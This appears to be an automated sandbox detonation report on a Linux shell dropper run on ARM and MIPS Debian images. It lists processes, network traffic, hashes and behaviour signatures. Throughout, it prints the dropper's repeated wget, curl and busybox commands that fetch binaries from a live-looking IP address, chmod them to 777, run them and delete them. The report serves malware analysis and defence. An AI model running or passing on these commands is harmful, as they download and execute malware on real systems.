[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
N/A 224.0.0.251:5353 udp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 151.101.65.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 195.181.164.19:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.61:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.61:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 03:02

Reported

2024-10-18 03:05

Platform

debian9-armhf-20240611-en

Max time kernel

26s

Max time network

67s

Command Line

[/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A

Processes

/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh

[/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/wget

[wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 03:02

Reported

2024-10-18 03:05

Platform

debian9-mipsbe-20240418-en

Max time kernel

58s

Max time network

60s

Command Line

[/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
